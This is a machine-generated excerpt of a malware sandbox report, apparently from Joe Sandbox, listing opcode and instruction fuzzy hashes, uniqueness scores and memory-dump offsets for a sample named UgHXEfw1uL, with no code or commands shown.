                                          • Instruction ID: 3acb03a0f076a004dd0024326f2e5a774aec8359207512aa7af610474b009aea
                                          • Opcode Fuzzy Hash: fd519af6e23c2759a5321c379ce57f7ed4cfe142e16e815177dc076cbe98805d
                                          • Instruction Fuzzy Hash: AC516F31900709DFCB11EF68C4459ADB7B1FF45304F259A6EE459AB262EB71EA81CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04e79e952b11ea1a63a1e749c3a32edffcd7fbe205e387ad9c5d15b7c1788639
                                          • Instruction ID: 5468dda2532c593f90b76c6a2c03ee65595ee5f3c70a864a20a82887f02dec37
                                          • Opcode Fuzzy Hash: 04e79e952b11ea1a63a1e749c3a32edffcd7fbe205e387ad9c5d15b7c1788639
                                          • Instruction Fuzzy Hash: B9514F31900B09DFCB11EFB8C85599DB7B1FF85310F218A6DE5556B262EB70AA85CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4157acbd6b4f1e24b87c1e761f2a148639bda1f43617ae4eb7ff78199c7709b2
                                          • Instruction ID: e6e27d61cb5cd597e389a1d00c6d26ed0c3a789702665cc15369ba7064e9c269
                                          • Opcode Fuzzy Hash: 4157acbd6b4f1e24b87c1e761f2a148639bda1f43617ae4eb7ff78199c7709b2
                                          • Instruction Fuzzy Hash: 79517231900B09DFDB11EFB8C4459ADB7B1FF85300F218A6DE5456B222EB70A985CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc77af96395ae05a706a1e7e0dfc0526aa80ae65a577ae48e88d0e2e70d1358e
                                          • Instruction ID: 51ac0862412d574c2ba423031c33e45550047a166f131c828c8a2723b00a5d5e
                                          • Opcode Fuzzy Hash: cc77af96395ae05a706a1e7e0dfc0526aa80ae65a577ae48e88d0e2e70d1358e
                                          • Instruction Fuzzy Hash: 94419D70B002049FDB15DF68C989BADBBF6EF89304F145469E48A9B7A1DB71EC41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f32e0c6094aa5649e6e728e55ecf1eff03c1f698b79c5e4a6bb3271f8e4096c
                                          • Instruction ID: a4b85530c0108b2000203c28980332f335799a487b10032e6cf007b7adec0bf9
                                          • Opcode Fuzzy Hash: 6f32e0c6094aa5649e6e728e55ecf1eff03c1f698b79c5e4a6bb3271f8e4096c
                                          • Instruction Fuzzy Hash: 5651A378601204AFDB54DF68D899DAD7BB2FF49724B154098FA42AB371DB31EC81CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070893244.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dad000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b26fef36472c2967e2b8a4bc3c3b4aba6cd3ab47b4b43cfa2df0f7583fa84084
                                          • Instruction ID: 445fe126bb28a7fc211c6e12f9b0c07421eb5c90823efeda5f913c180a2054c1
                                          • Opcode Fuzzy Hash: b26fef36472c2967e2b8a4bc3c3b4aba6cd3ab47b4b43cfa2df0f7583fa84084
                                          • Instruction Fuzzy Hash: 5F214575504204DFCB05DF14D9C0B26BF66FB99324F288568E80B0B65AC336D806CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a606d18def0376668d690b85930aedbcacefd4358d4eb259b4e24c93e12894c6
                                          • Instruction ID: 7d749c4789538c16266627569e05b182b19ce3df7e99145fc8067011ef1a0ecb
                                          • Opcode Fuzzy Hash: a606d18def0376668d690b85930aedbcacefd4358d4eb259b4e24c93e12894c6
                                          • Instruction Fuzzy Hash: 0A311AB0E042099FDB04CFAAC485AAEFBF2BB88300F14D5A59414E7315E7749A00CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070933974.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dbd000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bce21c733683b65146893dcd1a698f6fe610cd4a098e31efb26a61ac273ecbc4
                                          • Instruction ID: 18fbb338166ad31dce3f05767ae59d3a1a94d9dbb6da0567eb15dd6edd084f58
                                          • Opcode Fuzzy Hash: bce21c733683b65146893dcd1a698f6fe610cd4a098e31efb26a61ac273ecbc4
                                          • Instruction Fuzzy Hash: 17210475504340DFCB05DF54C9C0B6ABB66FB84324F24C96DE84A4B246D33AD806CB75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2070933974.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dbd000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb56d7abc1a669ba91cb78e18a1e055de1646f7504783d03ad4a8e949be53d8e
                                          • Instruction ID: 8843d8305a7cb7b14440705fa1b823bd8408323a3e77ea78e3280c6c97d7e77c
                                          • Opcode Fuzzy Hash: fb56d7abc1a669ba91cb78e18a1e055de1646f7504783d03ad4a8e949be53d8e
                                          • Instruction Fuzzy Hash: EA210475504204DFCB05CF14D9C0B66BBA6FB84324F24C96DD84A4B356D33AE806CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8925e8e71ce208c66ca148ea8d79e9d45f522724f3ecaa007a7afd81f7d6429
                                          • Instruction ID: f35351976de7838cfff97622862d503fdcbade69bfe7707c242983a536f38a5a
                                          • Opcode Fuzzy Hash: f8925e8e71ce208c66ca148ea8d79e9d45f522724f3ecaa007a7afd81f7d6429
                                          • Instruction Fuzzy Hash: 832179797002209FDB209E19D489E6AB3AAFB88724F00942EFA8697711CB71E841CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 969396382b89aeaacf40999d342af4c029c90a27e97f839587d0deeb086df433
                                          • Instruction ID: a264f93e1d7e7204714389d22633231d054f424288f7645bfc9ec296ba8ccbe9
                                          • Opcode Fuzzy Hash: 969396382b89aeaacf40999d342af4c029c90a27e97f839587d0deeb086df433
                                          • Instruction Fuzzy Hash: BD21F7B0E042099FDB04CFAAC585AAEFBF2BB89300F10D5A69459E7315E7709A40CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7f4335b540a11de967cf7a87c8d3aacf45c84c2e6be7841142b6877150d487a
                                          • Instruction ID: 6c2f58ca017db52cc56854e8e55951ca613b1de7672197a342e4de5dd7968cf5
                                          • Opcode Fuzzy Hash: f7f4335b540a11de967cf7a87c8d3aacf45c84c2e6be7841142b6877150d487a
                                          • Instruction Fuzzy Hash: 282148B0E11209DFCB48CFA9C4866AEBBF2FB88300F148569D41AE3350D7749A41CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bd08671e657f209cc51c5ebbcec4b2087858eafb976a8f3365beeb87d4a6d56
                                          • Instruction ID: e617a61704525ef1c2fbd9b81b78308e22c986515672f5cfa4af32f5a40c47a3
                                          • Opcode Fuzzy Hash: 9bd08671e657f209cc51c5ebbcec4b2087858eafb976a8f3365beeb87d4a6d56
                                          • Instruction Fuzzy Hash: 30213C70E05209EFDB44CFAAD5455AEFBF6AF88304F10D56A948AE7214E7309B40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd513a66e499983aa3591b3da3cbc92f0d9acf8d0473ce31ca7355c939a77d9a
                                          • Instruction ID: 90e8ec452121e4cc450a27658eb96d7d0abfe77534b6e9cad0e79f8795ace8b9
                                          • Opcode Fuzzy Hash: cd513a66e499983aa3591b3da3cbc92f0d9acf8d0473ce31ca7355c939a77d9a
                                          • Instruction Fuzzy Hash: 4B218F70E05249EFCB05CFA9C5455AEFFB2AF89300F14D5A6D086A7260D3308B40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 534da3d1b11f6435e49242501c291cc8962f9dd04e01c13ccad434e75949356d
                                          • Instruction ID: d36261dbafd4840eb838d04be5136c0b739e7164a97d2a74a3c13eb8b98ecdfc
                                          • Opcode Fuzzy Hash: 534da3d1b11f6435e49242501c291cc8962f9dd04e01c13ccad434e75949356d
                                          • Instruction Fuzzy Hash: F5211D71E0020A9FCB44DFA9C8849EFFBF5FF98300B10865AE528E7211E7709946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97a9f2459881969fa13adc9d95c848d8bfa13854b00505d60be5d4ad59731b21
                                          • Instruction ID: a7b209b264b7943c1c5f1dcf11466d7f57d302689ff2fee1e1cad6db1ae27f5b
                                          • Opcode Fuzzy Hash: 97a9f2459881969fa13adc9d95c848d8bfa13854b00505d60be5d4ad59731b21
                                          • Instruction Fuzzy Hash: AA219D797002109FDB20CF15C485E6A77B6BF88714F05906DFA8A9B761C731EC41CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9554ace0ede422ca523d0bd551ba394f9645f4b7205cdd1df3ab95ddd2b5f185
                                          • Instruction ID: 8fa2ef74267ddf250f4c8676e7ea6553e55ce19c5968d078063c2a4c89bbef28
                                          • Opcode Fuzzy Hash: 9554ace0ede422ca523d0bd551ba394f9645f4b7205cdd1df3ab95ddd2b5f185
                                          • Instruction Fuzzy Hash: 332125B0E05209DFCB48CFAAC5855AEBBF2FB88300F1095A9D41AE7354E774AA41CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5aa0ef4ce6816a5cbcacfa8b1bf2e63c36cccc68dc02ad1b7416ceea35b82235
                                          • Instruction ID: 9eaa6c9f176120ea25d419e6b50b47e1ff0841d47602e8a6c5732995c8c9c977
                                          • Opcode Fuzzy Hash: 5aa0ef4ce6816a5cbcacfa8b1bf2e63c36cccc68dc02ad1b7416ceea35b82235
                                          • Instruction Fuzzy Hash: 2DF03C32900709DBCB06AFA8D8598A9BB70FF95341B01CA9AE45A5B261FF30C594CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc6154139c755b88f36a2fbf956778df5dde6aa722dcd914f540a816872b959a
                                          • Instruction ID: 71cca7f839717f02f624d48964bee34e22811ff739a34256a2288a32c7179a0b
                                          • Opcode Fuzzy Hash: dc6154139c755b88f36a2fbf956778df5dde6aa722dcd914f540a816872b959a
                                          • Instruction Fuzzy Hash: 5FE092323446205BCB14A65DE845E6EB6EEEFCDA64B25017AF109C7355CE658C01C2D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c01db7a9e472743f73861d9ab809f1e09abea298dfa18e1bc819b5ef24d05ce
                                          • Instruction ID: 02a7c8f01e89fec49d5b21767c038ad7819080c7b9d3fa34422cc4d4765fc9c4
                                          • Opcode Fuzzy Hash: 5c01db7a9e472743f73861d9ab809f1e09abea298dfa18e1bc819b5ef24d05ce
                                          • Instruction Fuzzy Hash: 89F06D75D401498FDB60DFB8C886BAC7BB0EB14305F1484B9D458D6682E6758606CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c277906cb73153580cf84055bc640a13a96f4b36edaa41724ca5ac489f33387
                                          • Instruction ID: 5f4a3cee21735bec5317a48295e8acea09f4a85d911701ea6f336bb162bc986a
                                          • Opcode Fuzzy Hash: 4c277906cb73153580cf84055bc640a13a96f4b36edaa41724ca5ac489f33387
                                          • Instruction Fuzzy Hash: 1FF0F932910709DBCB05AF68C4148A9BBB4FF95340B01CA9AE94A9B221EF70D590CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0fb284ad1b48a5882969ec27ab445936e24dac3d1ba3eeab65289930ccfe6207
                                          • Instruction ID: 96dfdcd7d87ae2e170486b4673cd758852731a893b0f87a8312132382755b3a7
                                          • Opcode Fuzzy Hash: 0fb284ad1b48a5882969ec27ab445936e24dac3d1ba3eeab65289930ccfe6207
                                          • Instruction Fuzzy Hash: 99E04F72B001182BD714EEF99C489BFBAEEDB84554F11857A9809D7204FA309D01C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8a42ec4c4902cf4255e5a0cb8223e8bb4cd6aac728646786cc3a4e524448cd0
                                          • Instruction ID: a9019e15212221963d590e0b7a55e49df4065d2b42820b743a19616aa87796bc
                                          • Opcode Fuzzy Hash: f8a42ec4c4902cf4255e5a0cb8223e8bb4cd6aac728646786cc3a4e524448cd0
                                          • Instruction Fuzzy Hash: C3E0ED3269473487C710DF9DF5814B7B3A9E7487693188856E50DCA611E633D863C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f418ccfeb7d6075233d32a087b6476695612a553ab070d0b32f12ccd1f15f2f
                                          • Instruction ID: 3559c207cb8c46e7f02b38c248726d4959711e80fe19804d02999e807fd7f86b
                                          • Opcode Fuzzy Hash: 1f418ccfeb7d6075233d32a087b6476695612a553ab070d0b32f12ccd1f15f2f
                                          • Instruction Fuzzy Hash: 3EF0E5733002446FCB02DB98D909FAE7FDADF88321F08885BF949C7552D6B18851D760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 872fd0795a90b4a2b2e7ec29944b5d54622804d9b521e56a577b3052e38decda
                                          • Instruction ID: b7005cd4395b19fc1d6608f4cf2f2bcc7d30bca327daa3416e805724099dd1af
                                          • Opcode Fuzzy Hash: 872fd0795a90b4a2b2e7ec29944b5d54622804d9b521e56a577b3052e38decda
                                          • Instruction Fuzzy Hash: 44E092323002486FCB029A49E804EAFBFDEDFC8311B048416F949C7111CA72D911D7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1603b4922821c51b181dbd71b787b35126257d4d7ce68d8e3b3be348c9d5fada
                                          • Instruction ID: 9007c291b963d98812ffdecb21dd43ed4e694ac0f676820cc77eaf397376e00e
                                          • Opcode Fuzzy Hash: 1603b4922821c51b181dbd71b787b35126257d4d7ce68d8e3b3be348c9d5fada
                                          • Instruction Fuzzy Hash: B6E01A7195011EDADB10AB92E50DBEDBF71FB8521AF211422D192B1994C7310594CA91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44fc68c5c08402ee6903c2b157c444d058d648760b989d477198506174b2e62c
                                          • Instruction ID: fe0f78f94214ded8a6e871ffe3acfb040986234eaf7c0ad2b6ab324f2e1081ff
                                          • Opcode Fuzzy Hash: 44fc68c5c08402ee6903c2b157c444d058d648760b989d477198506174b2e62c
                                          • Instruction Fuzzy Hash: CDF03F7595521A8FCB60DFA8CA81AEDBBB2AB48300F5094A5A419A7714E630AE84DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b7f01f9a4cda8ab64e9c10ac75fc78c0f95d0d95b59ea31b8bfc0d772fd065a
                                          • Instruction ID: 984af47cc396edbc22dbf55abd2eb792711b6d749a490da3c80f99d88914bad2
                                          • Opcode Fuzzy Hash: 0b7f01f9a4cda8ab64e9c10ac75fc78c0f95d0d95b59ea31b8bfc0d772fd065a
                                          • Instruction Fuzzy Hash: 6CE0C2328A93489FD741EBB5DC0F6A97FB4AB01212F1441FA8948D3292E6305E08CBC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0fec4aa1eae13a7d5b25dc5ddc13d16720be0971d36b86bfa6049377651baead
                                          • Instruction ID: 4ec3db761c83066f378a6e384840e2b268d9ba98d21dd996d4b1663874035f56
                                          • Opcode Fuzzy Hash: 0fec4aa1eae13a7d5b25dc5ddc13d16720be0971d36b86bfa6049377651baead
                                          • Instruction Fuzzy Hash: 47E026328003186FEB109A98D88AB907799E700335F866060E94883182C270E840CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fef6d14c4f3740c287df236b9050570ffba50db1b40e32af9245c1401318451
                                          • Instruction ID: 4beef12e7df4654d2f1255426073552997e2ec4b5b0924091c5cb1311c026a3f
                                          • Opcode Fuzzy Hash: 7fef6d14c4f3740c287df236b9050570ffba50db1b40e32af9245c1401318451
                                          • Instruction Fuzzy Hash: 13D0A73181521CDBD744EBB8D40E66DBBF49B00205F1001B8890853250EA301E48DBC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4dc443b0f56abd4dd2f9b53ce8ee7a191bafe252521f281eef79bc04114e149c
                                          • Instruction ID: d10968145282f6e787f1b81e48bda5ea3248e55d7baf6af6bb665937872db06a
                                          • Opcode Fuzzy Hash: 4dc443b0f56abd4dd2f9b53ce8ee7a191bafe252521f281eef79bc04114e149c
                                          • Instruction Fuzzy Hash: 80E07E78611358CFC755CF24D189998BB72BF49312F5111E8E40A9B3A0CB35EAC1CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d74a932775b531f551363aec22c2cf82168f2ba8aebaba040c08b83bc6ef9ce
                                          • Instruction ID: f8ca4dce8d8822eb1a1801deb92700cafc19e181ed3c4fac37bd62423d31cd97
                                          • Opcode Fuzzy Hash: 6d74a932775b531f551363aec22c2cf82168f2ba8aebaba040c08b83bc6ef9ce
                                          • Instruction Fuzzy Hash: 22E01A70952219CFDB50DF28DD51B8CBBB2FF44200F105AD5D009A3254EB301E40CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3141c9125590d57396e44f0b5387e46b061f7ba22bf2e10759d8eb1d193de1c3
                                          • Instruction ID: 1ee6f5b5a0262cd5fc30e01750050d053c46e64398e8e54ea7148c262d39d734
                                          • Opcode Fuzzy Hash: 3141c9125590d57396e44f0b5387e46b061f7ba22bf2e10759d8eb1d193de1c3
                                          • Instruction Fuzzy Hash: 86D01770A052198BCB50DF64D984B8DB7BAFF84204F0099A5D00DEB118D7305D44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65a7925da98b619db9b57a54f04a9a73ce07edc31537cf20123e9029cface2e0
                                          • Instruction ID: a8f2cf6168a61f4bc4b78d30ae9b8d97a8bcb9ec9f3173e2a56dcde2e76ea83a
                                          • Opcode Fuzzy Hash: 65a7925da98b619db9b57a54f04a9a73ce07edc31537cf20123e9029cface2e0
                                          • Instruction Fuzzy Hash: 4BB01222715538130F0D31DE741E4AF728D49CA871244207FE58D97340CD851D01C3DE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
